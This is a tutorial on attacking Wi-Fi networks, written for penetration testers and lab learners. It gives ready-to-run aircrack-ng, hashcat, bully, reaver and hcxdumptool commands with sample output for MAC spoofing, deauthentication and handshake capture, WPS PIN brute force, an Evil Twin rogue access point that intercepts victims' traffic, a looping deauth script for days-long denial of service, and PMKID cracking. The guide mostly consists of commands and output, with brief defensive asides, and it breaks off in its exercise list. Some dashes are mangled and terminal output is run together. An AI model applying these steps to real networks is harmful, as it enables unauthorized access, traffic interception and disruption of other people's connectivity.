Wi-Fi is the wireless technology everyone uses and almost nobody understands past “the password is on the sticker.” That gap between usage and understanding is exactly why it remains one of the most consistently exploitable attack surfaces in any environment. Twenty-plus years after WEP shipped, wireless networks are still handing out access to anyone who knows where to look.
This guide covers 802.11 from the protocol level down to the exact commands you’ll run against a target AP. It’s built for penetration testers, OSCP candidates, and anyone working through HackTheBox or TryHackMe boxes that touch wireless. Every attack here has a defensive counterpart, because understanding why a mitigation fails is more useful than memorizing that it exists.
Wi-Fi Basics
Wi-Fi is IEEE 802.11, a family of standards for implementing a Wireless Local Area Network (WLAN) over specific frequency bands. That’s the formal definition. In practice, it’s a shared radio medium, which means everything transmitted over it is, by design, broadcast to anyone within range holding a receiver. This single fact underlies almost every attack in this guide.
Before diving into attacks, you need the vocabulary. Skip this section at your own risk. Half of the confusion beginners run into with aircrack-ng comes from mixing up an SSID and a BSSID.
AP (Access Point): The device clients connect to for network and internet access.
PSK (Pre-Shared Key): The password used to authenticate to the AP.
SSID: The human-readable name of the network. What shows up in your Wi-Fi list.
ESSID (Extended Service Set Identifier): Functionally the same as an SSID, but used when multiple APs share one network name, common in office and campus deployments where you roam between access points without disconnecting.
BSSID: The unique identifier for a specific AP, which is just its MAC address. If SSID is the network’s name, BSSID is the individual radio’s fingerprint. This distinction matters constantly in aircrack-ng work.
Channels: Wi-Fi operates on channels 1 through 14, though the US is restricted to 1 through 11 by regulation.
Power: The FCC caps US Wi-Fi transmission at 0.5 watts. Signal strength drops with distance, which is the whole basis of the physical range of an attack.
Modes: Three operating modes exist: master, managed, and monitor. APs run in master mode. Client devices run in managed mode by default. Monitor mode is what you need for wireless attacks, since it lets your adapter capture every frame in the air rather than just the ones addressed to it.
Range: At the legal power limit, most APs reach about 300 feet (100m) indoors. With a high-gain antenna on the receiving end, that range extends dramatically, sometimes to 20 miles line-of-sight. This is why “just don’t broadcast your SSID far” was never a real security control.
Frequency: Wi-Fi operates at 2.4GHz and 5GHz, with most modern hardware supporting both.

Wi-Fi Security Protocols
Your attack strategy depends entirely on which protocol is protecting the target, so knowing the history isn’t academic. It tells you what to try first.
WEP (Wired Equivalent Privacy) was the original security protocol for 802.11. It didn’t survive contact with researchers. By 2001, statistical attacks against WEP’s flawed RC4 implementation could recover a password in minutes. The IEEE scrambled for a replacement while every deployed AP sat effectively unsecured. A handful of legacy WEP access points still exist in the wild, and they remain trivial to crack, but you’re unlikely to encounter one outside of intentionally vulnerable lab environments at this point.
WPA (Wi-Fi Protected Access) arrived in 2003 as a stopgap. Its main virtue was that it didn’t require new hardware, just a firmware update. WPA still used RC4, but bolted on three improvements: a longer initialization vector (48 bits up to 128), TKIP to generate per-client keys, and a message integrity check to catch tampered packets in transit.
WPA2 finalized in June 2004 and represented a real architectural shift. It replaced RC4 with CCMP, built on AES. That processing overhead meant most existing APs needed a hardware refresh, but the payoff was a protocol that has held up far longer than its predecessors.
WPA2 supports Personal and Enterprise modes. In Personal mode (WPA2-PSK), the password combines with the SSID to generate a Pairwise Master Key (PMK), specifically to make rainbow-table attacks harder since the same password produces a different PMK on every network. The client and AP then exchange messages to derive a Pairwise Transient Key (PTK), unique per session, which is meant to blunt traffic sniffing. WPA3 is rolling out (since 2018) to patch WPA2’s remaining weaknesses, but adoption lags, and WPA2-PSK is still what you’ll face on the majority of real-world targets.

Wi-Fi Adapters for Hacking
Your laptop’s built-in Wi-Fi card almost certainly can’t do what you need. Wireless attacks require frame injection, the ability to craft and transmit arbitrary 802.11 frames onto the air, and most consumer chipsets simply don’t support it.
Aircrack-ng is the tool suite that defines this space; most GUI wireless attack tools are really just aircrack-ng with a skin on top. The project maintains a compatibility list of chipsets that support monitor mode and injection (search “aircrack-ng compatible cards” for the current list, since chipset support shifts as manufacturers change hardware revisions).
If you want a recommendation instead of doing the research yourself: Alfa cards have a long track record in this space and are widely used across the pentesting community. The AWUS036NH is a common starting point, priced under $40, and a high-gain antenna is a worthwhile add-on even though it isn’t strictly required.
Getting Your Adapter Ready
Before attacking anything, get comfortable with the reconnaissance commands.
View all network interfaces:
kali > ifconfig
┌──(kali㉿kali)-[~]└─$ ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.105 netmask 255.255.255.0 broadcast 192.168.1.255 ether 08:00:27:1a:2b:3c txqueuelen 1000 (Ethernet)lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 9c:b6:d0:12:34:56 txqueuelen 1000 (Wi-Fi)
Narrow that down to wireless-only interfaces:
kali > iwconfig
┌──(kali㉿kali)-[~]└─$ iwconfiglo no wireless extensions.eth0 no wireless extensions.wlan0 IEEE 802.11 Mode:Managed Frequency:2.437 GHz Access Point: Not-Associated Tx-Power=20 dBm
List every AP within range, along with MAC address, channel, frequency, ESSID, and mode:
kali > iwlist
┌──(kali㉿kali)-[~]└─$ iwlist wlan0 scanwlan0 Scan completed : Cell 01 - Address: 3C:84:6A:11:22:33 Channel:1 Frequency:2.412 GHz Quality=70/70 Signal level=-39 dBm ESSID:"HomeWiFi" Mode:Master Cell 02 - Address: 8A:BC:DE:44:55:66 Channel:6 Frequency:2.437 GHz Quality=52/70 Signal level=-58 dBm ESSID:"CoffeeShop" Mode:Master Cell 03 - Address: F0:9F:C2:77:88:99 Channel:11 Frequency:2.462 GHz Quality=41/70 Signal level=-69 dBm ESSID:"Office-Guest" Mode:Master
Monitor Mode
Monitor mode is the wireless equivalent of promiscuous mode on a wired NIC. It lets your card capture every frame passing through the air, not just frames addressed to it. This is non-negotiable for wireless attacks.
kali > airmon-ng start wlan0
┌──(kali㉿kali)-[~]└─$ sudo airmon-ng start wlan0PHY Interface Driver Chipsetphy0 wlan0 ath9k_htc Atheros AR9271 (mac80211 monitor mode enabled on [phy0]wlan0mon)
This renames your interface, typically to wlan0mon, and puts it into monitor mode. You may see a warning about conflicting processes. It’s usually safe to ignore, but if you do run into problems:
kali > airmon-ng check kill
┌──(kali㉿kali)-[~]└─$ sudo airmon-ng check killKilling these processes: PID Name 742 NetworkManager 819 wpa_supplicantProcesses successfully terminated.
Aircrack-ng Commands: Capturing Frames
With your card in monitor mode, start capturing:
kali > airodump-ng wlan0mon
┌──(kali㉿kali)-[~]└─$ sudo airodump-ng wlan0mon CH 6 ][ Elapsed: 0 mins ][ 2026-07-10 10:15 BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID 3C:84:6A:11:22:33 -39 42 8 1 300 WPA2 CCMP PSK HomeWiFi 8A:BC:DE:44:55:66 -58 27 3 6 130 WPA2 CCMP PSK CoffeeShop F0:9F:C2:77:88:99 -69 18 0 11 130 OPN -- Office-Guest BSSID STATION PWR Rate Lost Frames 3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -45 54e-54 0 16 8A:BC:DE:44:55:66 68:F7:28:DD:EE:FF -61 24e-24 0 5
This shows every AP in range in the upper pane and every connected client in the lower pane. Everything you need to plan an attack against a specific target is right there: BSSID, channel, ESSID, and signal strength.

Anatomy of Wi-Fi Frames
If you only ever run other people’s tools, you can skip this section. If you want to actually understand what those tools are doing, or build your own, this is the part that matters.
802.11 defines a set of frame types, each with a specific purpose in setting up, maintaining, and tearing down a wireless connection. Tools like airodump-ng and Kismet are built entirely on parsing and manipulating these frames. Each type below includes its Wireshark display filter.

Two of these deserve special attention because they’re the backbone of most attacks in this guide. The probe request/response pair is how a device finds networks even when SSID broadcasting is disabled, since the client has to ask for it by name and the AP has to confirm it exists. And the deauthentication frame is the workhorse of active wireless attacks: it terminates a client’s authentication, which forces a reconnection you can then capture, or simply denies service outright.
Wireshark Filters for Wi-Fi Frames
To build these filters interactively in Wireshark rather than typing them from memory: click the Expressions button next to the filter bar, search for “wlan” in the field search box, scroll to wlan.fc.subtype, select == as the relation, and enter the numeric value for the frame type you’re after. Bookmark the table above. You’ll come back to it every time you’re staring at a capture trying to figure out what’s actually happening on the wire.
Attacking Wi-Fi APs
This is where the terminology and frame knowledge pays off. Every attack below exploits a specific, well-documented weakness, and every one of them has a corresponding lesson for defenders.
Hidden SSIDs Don’t Work
Security teams are commonly advised to hide their SSID as a protective measure. It doesn’t hold up. When a legitimate client connects, both the probe request and probe response carry the SSID in the clear, regardless of whether the network broadcasts it in beacons. You also don’t strictly need the SSID at all if you have the BSSID, since that alone is often sufficient to connect. Airodump-ng will show you every BSSID in range without any extra effort. Hiding an SSID inconveniences legitimate users far more than it inconveniences an attacker.
Defeating MAC Filtering
MAC filtering is another control that sounds reasonable and folds quickly under real testing. The AP maintains a whitelist of allowed MAC addresses and drops connection attempts from anything else. The problem is that MAC addresses are broadcast in the clear on every frame a connected client sends, so an attacker just needs to observe one.
Find an authenticated client’s MAC:
kali > airodump-ng –c 11 –a –bssid <target BSSID>
┌──(kali㉿kali)-[~]└─$ sudo airodump-ng -c 11 --bssid 3C:84:6A:11:22:33 wlan0mon CH 11 ][ Elapsed: 0 mins ][ 2026-07-10 10:28 BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID 3C:84:6A:11:22:33 -38 117 42 11 300 WPA2 CCMP PSK HomeWiFi BSSID STATION PWR Rate Lost Frames 3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -44 54e-54 0 87 3C:84:6A:11:22:33 A8:1B:5A:12:34:56 -58 24e-24 0 21
Take your interface down:
kali> ifconfig wlan0 down
┌──(kali㉿kali)-[~]└─$ sudo macchanger -m 54:EF:44:AA:BB:CC wlan0Current MAC: 9C:B6:D0:12:34:56 (Unknown)Permanent MAC: 9C:B6:D0:12:34:56 (Unknown)New MAC: 54:EF:44:AA:BB:CC (Unknown)
Spoof the client’s MAC address with macchanger:
kali > macchanger –m <target MAC> wlan0
┌──(kali㉿kali)-[~]└─$ sudo macchanger -m 54:EF:44:AA:BB:CC wlan0Current MAC: 9C:B6:D0:12:34:56 (Unknown)Permanent MAC: 9C:B6:D0:12:34:56 (Unknown)New MAC: 54:EF:44:AA:BB:CC (Unknown)
Bring the interface back up:
kali > ifconfig wlan0 up
Your adapter now presents the same MAC as a device already on the whitelist, and the AP has no way to tell the difference. MAC filtering raises the bar for casual network squatters. It does essentially nothing against a deliberate attacker.
Attacking WPA2-PSK: The 4-Way Handshake
Unlike WEP, you can’t statistically crack WPA2 in minutes. The approach mirrors offline password cracking generally: capture the password hash as it crosses the air during authentication, then throw a wordlist at it with hashcat.
The point of interest is the four-way handshake, the exchange between client and AP where the password hash gets transmitted. Capture that exchange, and you have everything you need for an offline attack.

Put your card into monitor mode and start capturing, targeting a specific AP and channel:
kali > airmon-ng start wlan0
┌──(kali㉿kali)-[~]└─$ sudo airmon-ng start wlan0PHY Interface Driver Chipsetphy0 wlan0 ath9k_htc Atheros AR9271 (mac80211 monitor mode enabled on [phy0]wlan0mon)
kali > airodump-ng –bssid <target BSSID> -c <channel> --write TCSG wlan0mon
┌──(kali㉿kali)-[~]└─$ sudo airodump-ng --bssid 3C:84:6A:11:22:33 -c 11 --write TCSG wlan0mon CH 11 ][ Elapsed: 0 mins ][ 2026-07-10 10:41 BSSID PWR Beacons #Data CH MB ENC CIPHER AUTH ESSID 3C:84:6A:11:22:33 -37 184 61 11 300 WPA2 CCMP PSK HomeWiFi BSSID STATION PWR Rate Lost Frames 3C:84:6A:11:22:33 54:EF:44:AA:BB:CC -43 54e-54 0 96 CH 11 ][ WPA handshake: 3C:84:6A:11:22:33 ]
If you don’t want to wait for a client to naturally reconnect, force it:
kali > aireplay-ng –deauth 100 –a AA:BB:CC:DD:EE:FF wlan0mon
┌──(kali㉿kali)-[~]└─$ sudo aireplay-ng --deauth 100 -a 3C:84:6A:11:22:33 wlan0mon18:42:15 Waiting for beacon frame (BSSID: 3C:84:6A:11:22:33)Sending 64 directed DeAuth framesSending 36 broadcast DeAuth frames18:42:19 Done.
Here, --deauth 100 sends 100 deauthentication frames at the AP, -a specifies the target BSSID, and wlan0mon is your adapter. When the disconnected client reconnects, airodump-ng automatically detects and captures the handshake into your designated file.
Crack the captured handshake:
kali > hashcat –m 16800 TCSG-01.cap /root/top10000passwords.txt
┌──(kali㉿kali)-[~]└─$ hashcat -m 16800 TCSG-01.cap /root/top10000passwords.txthashcat (v6.x.x) starting...OpenCL API initialized.Dictionary cache built.Session..........: TCSGStatus...........: ExhaustedHash.Mode........: 16800 (WPA-PMKID+EAPOL)Recovered........: 0/1 (0.00%)Progress.........: 10000/10000 (100.00%)Time.Estimated...: 00:00:04Started: Fri Jul 10 10:42:01 2026Stopped: Fri Jul 10 10:42:05 2026
If the default wordlist comes up empty, build a custom one with ceWL, cupp, or crunch, tailored to what you know about the target (company name, common patterns, leaked credential reuse), and run hashcat again. This step alone often makes the difference between a failed engagement and a successful one, since generic wordlists rarely beat a password someone actually chose for their own network.
WPS: The Convenience Feature That Broke Everything
WPS (Wi-Fi Protected Setup) exists because setting up secure Wi-Fi correctly was too hard for the average user, so the industry built a push-button pairing system instead. It relies on an eight-digit PIN, but the eighth digit is a checksum, and worse, the remaining seven digits are validated in two independent chunks: the first four, then the last three. That splits the keyspace into 10,000 possibilities plus 1,000 possibilities, a total of 11,000 combinations instead of the 10 million you’d expect from a genuine 7-digit PIN. A computer can brute-force that in a matter of hours.

WPS 2.0 patched this in 2012, but a meaningful chunk of deployed APs, somewhere around 10 to 20 percent by most estimates, still run vulnerable WPS 1.0.
Find WPS-enabled APs in range:
kali > wash –i wlan0mon
Brute-force the PIN with bully:
kali > bully wlan0mon –b 00:11:22:33:44:55 –e TargetESSID –c 11
Or with reaver:
kali > reaver –i wlan0mon –b 00:11:22:33:44:55 –vv
kali@kali:~$ wash -i wlan0monWPS BSSID Channel RSSI WPS Version WPS Locked ESSID----------------------------------------------------------------------00:11:22:33:44:55 11 -42 1.0 No TargetESSIDAA:BB:CC:DD:EE:FF 6 -75 1.0 Yes Neighbor_Net11:22:33:44:55:66 1 -88 1.0 No CoffeeShop_Guest^Ckali@kali:~$ bully wlan0mon -b 00:11:22:33:44:55 -e TargetESSID -c 11[!] Bully v1.4.00 - WPS brute-force attack[+] Running on wlan0mon[+] BSSID: 00:11:22:33:44:55[+] ESSID: TargetESSID[+] Channel: 11[+] Vendor: RalinkTek[+] Starting PIN brute-force...[+] Trying PIN 00000000 (1/11000) ... [M1/M2] [Timeout][+] Trying PIN 00001000 (2/11000) ... [M1/M2] [Timeout][+] Trying PIN 00002000 (3/11000) ... [M1/M2] [Timeout]...[+] Trying PIN 12345670 (452/11000) ... [M1/M2/M3/M4/M5/M6/M7/M8][+] WPS PIN: '12345670'[+] WPA PSK: 'TargetWPAKey123'[+] AP SSID: 'TargetESSID'kali@kali:~$ reaver -i wlan0mon -b 00:11:22:33:44:55 -vvReaver v1.6.6 WiFi Protected Setup Attack Tool[+] Waiting for beacon from 00:11:22:33:44:55[+] Received beacon from 00:11:22:33:44:55[+] Vendor: RalinkTek[+] Restoring previous session[+] Trying pin '12345670'[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending M8 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin '01030405'...[+] Pin cracked: 12345670[+] WPS PIN: '12345670'[+] WPA PSK: 'TargetWPAKey123'[+] AP SSID: 'TargetESSID'kali@kali:~$
Swap in the real BSSID, ESSID, and channel for your target in both cases. If WPS is enabled and vulnerable, this is often the fastest path to full access, faster than cracking WPA2-PSK directly.
Evil Twin: Attacking the Traffic, Not the Password
Sometimes the password isn’t the goal. You want the traffic itself, credentials for other services, session tokens, anything passing over the connection unencrypted. An Evil Twin AP, a rogue access point broadcasting the same SSID as a legitimate one, gets you there by routing the victim’s traffic through your machine.

Build the fake AP with airbase-ng:
kali > airbase-ng –a aa:bb:cc:dd:ee:ff --essid tcsg –c 6 wlan0mon
Check your interfaces. You’ll see a new one, at0, with no wireless extensions yet:
kali > iwconfig
Bridge at0 to your internet-facing interface (eth0 here) so client traffic actually reaches the internet through you:
kali > ip link add name ha type bridgekali > ip link set ha upkali > ip link set eth0 master hakali > ip link set at0 master ha
Start a DHCP server on the bridge so connecting clients get an IP address:
kali > dhclient ha &
Knock clients off the legitimate AP so they reconnect to your rogue one instead:
kali > aireplay-ng –deauth 1000 aa:bb:cc:dd:ee:ff wlan0mon –ignore-negative-one
kali@kali:~$ sudo airbase-ng -a aa:bb:cc:dd:ee:ff --essid tcsg -c 6 wlan0mon14:22:01 Created tap interface at014:22:01 Listening on channel 614:22:01 Waiting for clients...kali@kali:~$ iwconfiglo no wireless extensions.eth0 no wireless extensions.at0 IEEE 802.11 Mode:Master Frequency:2.437 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:on wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:onkali@kali:~$ sudo ip link add name ha type bridgekali@kali:~$ sudo ip link set ha upkali@kali:~$ sudo ip link set eth0 master hakali@kali:~$ sudo ip link set at0 master hakali@kali:~$ sudo dhclient ha &[1] 4512kali@kali:~$ Internet Systems Consortium DHCP Client 4.4.1Copyright 2004-2018 Internet Systems Consortium.All rights reserved.For info, please visit https://www.isc.org/software/dhcp/Listening on LPF/ha/00:11:22:33:44:55Sending on LPF/ha/00:11:22:33:44:55Sending on Socket/fallbackDHCPDISCOVER on ha to 255.255.255.255 port 67 interval 8DHCPOFFER of 192.168.1.105 from 192.168.1.1DHCPREQUEST for 192.168.1.105 on ha to 255.255.255.255 port 67DHCPACK of 192.168.1.105 from 192.168.1.1bound to 192.168.1.105 -- renewal in 1800 seconds.kali@kali:~$ sudo aireplay-ng --deauth 1000 -a aa:bb:cc:dd:ee:ff wlan0mon --ignore-negative-one14:25:10 Waiting for beacon frame (BSSID: aa:bb:cc:dd:ee:ff) on channel 614:25:11 Found 1 AP14:25:11 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]14:25:11 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]14:25:12 Sending DeAuth (code 7) to broadcast -- BSSID: [aa:bb:cc:dd:ee:ff]...14:25:15 Sent 1000 packets.
Open Wireshark and select the ha interface. Every packet from a reconnected client now traverses your machine in the clear. Right-click any packet and choose “Follow Stream” to reconstruct an entire session. This is precisely why unencrypted HTTP and unauthenticated protocols are so dangerous on public or compromised Wi-Fi: the network layer offers zero protection once someone else controls the AP you’re actually talking to.
Denial of Service via Deauth
The deauthentication frame that powers the two previous attacks is also, on its own, a denial-of-service tool. Send enough deauth frames and you can knock every client off an AP indefinitely, and on older hardware, sometimes crash the AP itself hard enough to require a manual reboot.
kali > aireplay-ng –deauth 100 –a <target BSSID> wlan0mon
A single burst knocks clients off only for the duration of the attack; they reconnect once it stops. To sustain it, wrap the command in a bash loop that fires periodically:
for i in {1..5000}do aireplay-ng --deauth 10 -a <target BSSID> wlan0monsleep 60done
kali@kali:~$ cat << 'EOF' > deauth_loop.sh#!/bin/bashTARGET_BSSID="00:11:22:33:44:55"for i in {1..5000}do echo "[*] Iteration $i: Sending deauth burst..." aireplay-ng --deauth 10 -a $TARGET_BSSID wlan0mon --ignore-negative-one echo "[*] Burst complete. Sleeping for 60 seconds..." sleep 60doneEOFkali@kali:~$ chmod +x deauth_loop.shkali@kali:~$ sudo ./deauth_loop.sh[*] Iteration 1: Sending deauth burst...14:30:01 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 614:30:01 Found 1 AP14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:30:01 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:30:02 Sent 10 packets.[*] Burst complete. Sleeping for 60 seconds...[*] Iteration 2: Sending deauth burst...14:31:02 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 614:31:02 Found 1 AP14:31:02 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:31:02 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:31:03 Sent 10 packets.[*] Burst complete. Sleeping for 60 seconds...[*] Iteration 3: Sending deauth burst...14:32:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 614:32:03 Found 1 AP14:32:03 Sending DeAuth (code 7) to broadcast -- BSSID: [00:11:22:33:44:55]14:32:04 Sent 10 packets.[*] Burst complete. Sleeping for 60 seconds...^Ckali@kali:~$
That loop sends deauth frames every 60 seconds for 5,000 iterations, roughly three days of continuous disruption. Adjust the iteration count for shorter or longer campaigns. This is also a good moment to note the defensive angle: 802.11w (Management Frame Protection) exists specifically to authenticate management frames like deauth and prevent exactly this kind of spoofing, and its absence on a target network is worth flagging in any report.
PMKID Attack: Skipping the Handshake Entirely
In August 2018, the hashcat team found a way to skip the client-disconnection step altogether. Instead of forcing a handshake, you extract the PMKID directly from a single RSN Information Element frame, no connected client required.

Here’s the mechanism: when your adapter searches for known networks, it probes for them. If the target AP is in range, it responds with an RSN frame. Your adapter sends an Authentication Request, the AP replies with its own authentication frames, and your adapter follows up with an Association Request carrying the ESSID and RSN. The AP responds with an EAPOL frame that, on vulnerable implementations, contains the PMKID, built from the PMK, PMK name, AP MAC address, and station MAC address, all hashed via HMAC-SHA1-128.
The tooling isn’t in Kali by default, so build it first:
kali > git clone https://github.com/ZerBea/hcxdumptool.gitkali > cd hcxdumptoolkali > makekali > make installkali > git clone https://github.com/ZerBea/hcxtools.gitkali > cd hcxtoolskali > makekali > make install
Put your adapter back into monitor mode and start pulling PMKIDs from nearby APs:
kali > airmon-ng start wlan0kali > hcxdumptool –I wlan0mon –o TCSG –enable_status=1
Expect this to succeed against most APs in range, though not all, typically 80 to 90 percent depending on hardware and configuration.
To focus on one target, grab its BSSID from airodump-ng and write it to a plain text file with no colons and no spaces:
kali > cat > targetBSSID
(Exit with Ctrl+D.)
Then filter the capture to just that AP:
kali > hcxdumptool –I wlan0mon –o HackersArisePMKID –enable_status=1 –filterlist_ap=targetBSSID –filtermode=2
Convert the capture into a hashcat-compatible format:
kali > hcxcaptool –z hashoutput.txt HackersArisePMKID
And crack it, using hash mode 16800 for this specific PMKID format:
kali > hashcat –m 16800 hashoutput.txt top10000passwords.txt
kali@kali:~$ git clone https://github.com/ZerBea/hcxdumptool.gitCloning into 'hcxdumptool'...remote: Enumerating objects: 1850, done.remote: Counting objects: 100% (1850/1850), done.remote: Compressing objects: 100% (650/650), done.remote: Total 1850 (delta 1200), reused 1850 (delta 1200), pack-reused 0Receiving objects: 100% (1850/1850), 1.25 MiB | 4.50 MiB/s, done.Resolving deltas: 100% (1200/1200), done.kali@kali:~$ cd hcxdumptoolkali@kali:~/hcxdumptool$ makegcc -MMD -MF .obj/hcxdumptool.d -I/usr/include -I/usr/local/include -Wall -Wextra -O2 -o obj/hcxdumptool.o -c src/hcxdumptool.cgcc -o hcxdumptool obj/hcxdumptool.o -lcrypto -lz -lrt -lpthreadkali@kali:~/hcxdumptool$ sudo make installinstall -m 0755 hcxdumptool /usr/local/binkali@kali:~/hcxdumptool$ cd ..kali@kali:~$ git clone https://github.com/ZerBea/hcxtools.gitCloning into 'hcxtools'......kali@kali:~$ cd hcxtoolskali@kali:~/hcxtools$ make...kali@kali:~/hcxtools$ sudo make installinstall -m 0755 hcxcaptool /usr/local/bin...kali@kali:~/hcxtools$ cd ..kali@kali:~$ sudo airmon-ng start wlan0PHY Interface Driver Chipsetphy0 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070 (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 monitor mode vif disabled)kali@kali:~$ sudo hcxdumptool -I wlan0mon -o TCSG --enable_status=1Start capturing (press CTRL+C to stop) ...15:10:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID15:10:05 [1] PMKID: AABBCCDDEEFF / 665544332211 / Neighbor_Net15:10:12 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)^Ckali@kali:~$ cat > targetBSSID001122334455^Dkali@kali:~$ sudo hcxdumptool -I wlan0mon -o HackersArisePMKID --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2Start capturing (press CTRL+C to stop) ...Filtering for AP: 00112233445515:15:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID15:15:45 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)^Ckali@kali:~$ hcxcaptool -z hashoutput.txt HackersArisePMKIDkali@kali:~$ cat hashoutput.txtd353803e2813b95055a262947b7d7c7b*001122334455*112233445566*5461726765744553534944kali@kali:~$ hashcat -m 16800 hashoutput.txt top10000passwords.txthashcat (v6.2.6) starting...OpenCL API (OpenCL 3.0 PoCL 3.0 Linux, Non-Debug+Assert, RELOC, LLVM 13.0.1, SLEEF, FP32=1, POCL_DEBUG) - Platform #1 [The pocl project]* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU, skippedMinimum password length supported by this hash type: 8Maximum password length supported by this hash type: 63Hashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesRules: 1Optimizers applied:* Zero-Byte* Not-Iterated* Single-Hash* Single-SaltWatchdog: Temperature abort trigger set to 90cd353803e2813b95055a262947b7d7c7b:TargetPassword123Session..........: hashcatStatus...........: CrackedHash.Name........: WPA-PMKID-PBKDF2Hash.Target......: d353803e2813b95055a262947b7d7c7b*001122334455*11223...Time.Started.....: Fri Jul 10 15:20:01 2026 (0 secs)Time.Estimated...: Fri Jul 10 15:20:01 2026 (0 secs)Kernel.Feature...: Pure KernelGuess.Base.......: File (top10000passwords.txt)Guess.Queue......: 1/1 (100.00%)Speed.#1.........: 1045 H/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8Recovered........: 1/1 (100.00%) DigestsProgress.........: 100/10000 (1.00%)Rejected.........: 0/100 (0.00%)Restore.Point....: 0/10000 (0.00%)Candidates.#1....: 123456 -> TargetPassword123Started: Fri Jul 10 15:19:55 2026Stopped: Fri Jul 10 15:20:02 2026kali@kali:~$
Be aware that hcxcaptool and hashcat mode 16800 are legacy; modern versions of Kali use hcxpcapngtool
For hcxpcapngtool :
kali@kali:~$ cat targetBSSID001122334455kali@kali:~$ sudo hcxdumptool -i wlan0mon -o HackersArisePMKID.pcapng --enable_status=1 --filterlist_ap=targetBSSID --filtermode=2Start capturing (press CTRL+C to stop) ...Filtering for AP: 00112233445515:15:01 [1] PMKID: 001122334455 / 112233445566 / TargetESSID15:15:45 [1] PMKID: 001122334455 / 112233445566 / TargetESSID (updated)^CSummary: PMKIDs: 1 EAPOL pairs: 0kali@kali:~$ hcxpcapngtool -o hash.hc22000 HackersArisePMKID.pcapnghcxpcapngtool 6.3.2 Copyright by ZeroBeatstart reading from HackersArisePMKID.pcapngfile format: pcapng...summary: CAP handshakes: 0 PMKIDs: 1 EAPOL pairs: 0...written to hash.hc22000kali@kali:~$ cat hash.hc22000WPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122334455*112233445566*5461726765744553534944***kali@kali:~$ hashcat -m 22000 hash.hc22000 top10000passwords.txthashcat (v6.2.6) starting...OpenCL API (OpenCL 3.0 PoCL 3.0 Linux, Non-Debug+Assert, RELOC, LLVM 13.0.1, SLEEF, FP32=1, POCL_DEBUG) - Platform #1 [The pocl project]* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU, skippedMinimum password length supported by this hash type: 8Maximum password length supported by this hash type: 63Hashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesRules: 1Optimizers applied:* Zero-Byte* Not-Iterated* Single-Hash* Single-SaltWatchdog: Temperature abort trigger set to 90cWPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122334455*112233445566*5461726765744553534944***:TargetPassword123Session..........: hashcatStatus...........: CrackedHash.Name........: WPA-PBKDF2-PMKID+EAPOLHash.Target......: WPA*01*4b8d7e2f9a1c3e5d6f8a2b4c6d8e0f2a*001122...Time.Started.....: Fri Jul 10 15:20:01 2026 (0 secs)Time.Estimated...: Fri Jul 10 15:20:01 2026 (0 secs)Kernel.Feature...: Pure KernelGuess.Base.......: File (top10000passwords.txt)Guess.Queue......: 1/1 (100.00%)Speed.#1.........: 1045 H/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8Recovered........: 1/1 (100.00%) DigestsProgress.........: 100/10000 (1.00%)Rejected.........: 0/100 (0.00%)Restore.Point....: 0/10000 (0.00%)Candidates.#1....: 123456 -> TargetPassword123Started: Fri Jul 10 15:19:55 2026Stopped: Fri Jul 10 15:20:02 2026kali@kali:~$
Choosing the Right Attack
Twenty years of patching hasn’t killed 802.11 as an attack surface, it’s just narrowed the easy paths and forced attackers (and defenders) to be more deliberate about which one they take. Picking the wrong strategy wastes hours you don’t get back on an engagement.
If WPS is enabled and unpatched, that’s your fastest route in: 11,000 possible PINs is nothing next to a full WPA2 keyspace. If you just need visibility into a target’s traffic rather than the password itself, Evil Twin gets you there without ever touching PSK cracking. If you’re stuck with a straight WPA2-PSK target, PMKID is worth trying first since it requires no client interaction, and the 4-way handshake with a good custom wordlist is your fallback. None of these are fast in an absolute sense. All of them are faster than the alternative of guessing blind.
Exercises
- Run
iwconfigand identify every wireless interface on your system. - Use
airmon-ngto put your adapter into monitor mode. - Run
